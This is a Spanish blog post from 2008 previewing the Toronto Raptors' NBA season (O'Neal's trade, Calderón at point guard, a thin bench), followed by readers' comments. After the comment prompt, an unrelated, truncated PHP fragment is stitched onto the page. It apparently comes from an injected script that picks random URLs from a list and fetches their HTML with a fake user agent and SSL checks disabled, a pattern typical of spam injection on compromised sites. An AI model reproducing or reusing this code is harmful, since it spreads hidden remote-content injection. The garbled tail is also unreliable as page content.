Toronto Raptors: Cambios de dirección

03 de October de 2008 por telekoman

boshjermaineTras una temporada extraña y un tanto descorazonadora, los Raptors apuestan por los cambios intentando dar un giro de liderazgo profundo. La baja de Garbajosa (ya definitiva, junto con Delfino), la temporada desastrosa de Bargnani y la lesión de larga duración de T.J. Ford así lo han propiciado.

El cambio fundamental viene con la incorporación de Jermaine O’Neal a la plantilla. El “otro” O’Neal, un jugador de gran calidad, con vitola de estrella, pero que salvo la temporada 03-04 no ha sido capaz de llevar a Indiana a las cotas que se esperaban, viene a reforzar el juego interior de la franquicia canadiense. Si él y Bosh son capaces de compenetrarse formarán un tandem muy peligroso en ataque, quizás el más duro de la conferencia Este junto con el formado por Brand-Dalembert.

Pero ojo, no nos engañemos, O’Neal no viene en el mejor momento de su carrera y además ambos jugadoresjuegan mejor en la posición de 4 que de 5. Habrá que ver si la química entre ambos es la adecuada. También ofrece dudas el teórico liderazgo del equipo. Durante estas pasadas temporadas a Chris jmcaldeBosh se le ha acusado de no saber liderar al equipo en post-season, hasta el punto de que Toronto no ha sido capaz de pasar de ronda. Es una incógnita el comportamiento de O’Neal.

Para nosotros, sin embargo, el cambio más interesante viene en la posición de base. Se generó un interesante debate entre el titular, T.J. Ford, y el suplente, Calderón. Ford era un base más anotador que Calderón, mientras que Calderón dirigía mejor al equipo. El entrenador Sam Mitchell posiblemente estaba encantado con la situación, teniendo como tenía la posibilidad de mantener en pista un base de garantías durante todo el partido. El debate se aparcó tras la lesión cervical de T. J. Ford, que le mantuvo alejado de las pistas un par de meses. La buena actuación del base español junto a la necesidad de dar un giro a la franquicia propició el traspaso de Ford a cambio de O’Neal y la renovación al alta de Calderón. Sin duda, este año el base de Villanueva de la Serena deberá refrendar lo hecho durante la temporada pasada y con más minutos aumentar las 8 asistencias de media y, si es posible, entrar en el All-Star que se le negó el año pasado. Será muy interesante ver si Calderón es capaz de dirigir a sus compañeros para que pasen de primera ronda de bargnani1Playoffs en una conferencia que parece más interesante que en años anteriores.

El resto de posiciones está bastante claro, sobre todo teniendo en cuenta que la rotación de los Raptors es algo escasa. Anthony Parker y Jason Kapono completarán seguramente el quinteto titular apartando a un Jamario Moon que tras una gran temporada ve frenada ligeramente su progresión con la llegada de O’Neal.

Bargnani, tras su incomprensible año sabático, Moon y Brezec lucharán por los minutos que dejen Bosh y O’Neal cerca del aro. Roko Ukic y el rookie Willie Salomon serán los suplentes de Calderón, mientras que Graham, Humphries y Jawai completarán una plantilla que se antoja corta.

Quinteto inicial: Calderón, Parker, Kapono, Bosh y O’Neal

Sexto hombre: Moon/Bargnani (dependerá de cómo vuelva el italiano)

Pronóstico: Primera ronda (ooootra vez)

Comenta

8 comentarios a esta entrada

  1. Txusma dice:
    #1

    Corta, corta, cortísima… Este banquillo es aún peor que el de Charlotte, no Deer? 😉

      Citar

  2. Jose Viruete dice:
    #2

    Sensacional esta serie de artículos de equipos temporada a temporada. Tengo la sensación de que Bosh va a sacar algo de caracter. En las olimpiadas me sorprendió para bien.

      Citar

  3. TheDeerHunter dice:
    #3

    Pues efectivamente, Txus… no sé exáctamente si peor porque no me gustaría enterrar a Bargnani antes de tiempo.
    Lamentablemente, empezamos a asistir con este equipo a una especie de caso “Grizzlies 2”.
    Las similitudes con aquel ejemplo son verdaderamente preocupantes para los que le deseamos lo mejor a Calderón esté donde esté.

    Ya hemos comentado en otras ocasiones ese “cambio de dirección” con el que titulas el post. Para mí más que eso, el año pasado se perdió el norte y un buen número de errores consecutivos y otras eventualidades han dejado este proyecto al borde del abismo.
    Me gustaría pensar otra cosa pero creo todo esto lo van a pagar muy caro durante años tanto la franquicia como Calderón, atado al destino de los Raptors hasta dentro de bastante.

    La cosa es que, el verano no empezó con demasiada mala pinta con el fichaje de “El Otro Oneal”, una jugada bastante arriesgada y de cuestionable valor táctico. Pero es que, con todo, poco más se ha hecho para tratar de corregir la deriva… bueno algo más sí han hecho. Perder a Delfino. Una putada gorda para ellos.

    Así que lo que pueda aportar O’neal es la última esperanza que tienen. ¿Insuficiente??
    No podeis negar que la idea de un juego interior Bosh-Oneal es atractiva… bien, ambos son PFs, pero también se han dado de leches con los pívots más duros en numerosísimas ocasiones.
    Por otro lado Oneal ya no es el que era, ha sufrido un declive sorprendente… pero tampoco sabemos a ciencia cierta hasta qué punto su bajo rendimiento de los últimos tiempos estaba causado por problemas de motivación típicos en jugadores que llevan demasiado tiempo en el mismo equipo.

    Sea como sea, supongo que sí les llega para entrar tranquilamente en playoffs. Lo de palmar en primera ronda no lo va a poder evitar nadie.

      Citar

  4. Jabho dice:
    #4

    Yo creo que los Raptors estan lejos de los Grizzlies. De moemnto son un equipo que estan arriesgando muchos estos años. Algunas apuestas, tipo Calde, Parker o Moon, estan saliendo bien. Otras, por mas que nos duela, tipo Garbajosa o Barganani estan saliendo mal.

    Pero son un equipo que desde luego asume riesgos y es imaginativo a la hora de reforzarse.

    Este año han apostado fuerte por O´neal. Buscan dejar a Calderon tranquilo y que O ´neal vuelva a ser el que es. Si Maine vuelve por sus fueros ojito con ellos. Aun sin eso son mas fuertes que el año pasado.

    Por dentro a poco que O´neal y / o Barganani aporten un poquito tienen una buena rotación. Los 2 más Bosh mas Humphreis, tipo duro y trabajador, van cubiertos. Por fuera es cierto que no tienen relevo para Calde y que en los aleros tampoco tiene para tirar cohetes.

    Pero me gusta su rumbo y como se mueven. El año que viene liberan algo de dinero de Garbo que les dará para fichar algun FA más. Y si lo de O´neal sale mal el año que viene tienen un expiring de 20$ que les dará poder moverse seguro.

    Así que me gusta la pinta de los Raptors. Con muchos problemas de lesiones se han movido por encima del 50% de victorias. Asumen riesgos pero tienen en el duo Calde-Bosh un base solida para unos cuantos años. Y no tienen grandes contratos que les ahoguen mas allá de 2 años…

    Este año creo que estan en el grupo de los que pueden opctar a 2ª ronda. Ahí veo a Boston y Cavs, luego Detroit, Philly, Magic, Wizards y ellos muy igualados… va a estar abierta la lucha.

      Citar

  5. MagicJohnson32 dice:
    #5

    Buena parte de las posibilidades del equipo de llegar a 2ª ronda recaerán sobre Calde, dependerán de si es capaz de aguantar todo el año sin bajar el nivel como le pasó en el tramo final de la pasada temporada. Bosh-Maine funcionarán bien, salvo que Jermaine siga lesionándose. Y luego, pese a que Parker me encanta, los veo cortitos de recursos. De Bargnani espero poco, y Kapono, Moon & Co. no dan para más. Por eso, todo dependerá del rendimiento y la salud del trío principal.

      Citar

  6. portu dice:
    #6

    Veo más a Moon de titular q a Kapono, sobretodo pq la titularidad de Moon del año pasado era en la posición de 3, casi nunca jugó de 4, y parece lógico q se mantenga ese rol. Existe de cualquier modo, un buen suplente en el puesto de escolta/alero q es Kapono y otro en los puestos interiores, q sería Bargnani, y después unos cumplidores Graham y Humphries. Es una plantilla corta, pero 7 jugadores buenos a veces es mejor q 9o 10, se crea un núcleo más compacto y a veces hay buena producción. Pero el resultado no creo q dependa de eso, sino de la salud y la implicación de J. O´Neal, q si no es buena, hará q el equipo sea más débil q el año pasado.

      Citar

  7. Txusma dice:
    #7

    Calde afronta una temporada muy importante y ademas viene de un verano sin descando y con lesión incluida. Quieras que no, creo q no deberia jugar de mas de 30-35 minutos por partido, pero es que sus suplentes, sobre el papel, son de un nivel muy bajo. Él y O’Neal seran la clave, confiando que Bosh mantenga el nivel de los últimos años.

      Citar

  8. Viva_Dirk dice:
    #8

    Si O’Neal vuelve a sus números y esta involucrado pueden ser un equipo muy jodido de ganar, si esta situación hace que Bargnani este especialmente motivado, pueden convertirse en un equipo aspirante en el Este.

    Aunque quizá fuese un buen momento para vender a italiano por un alero de nivel.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>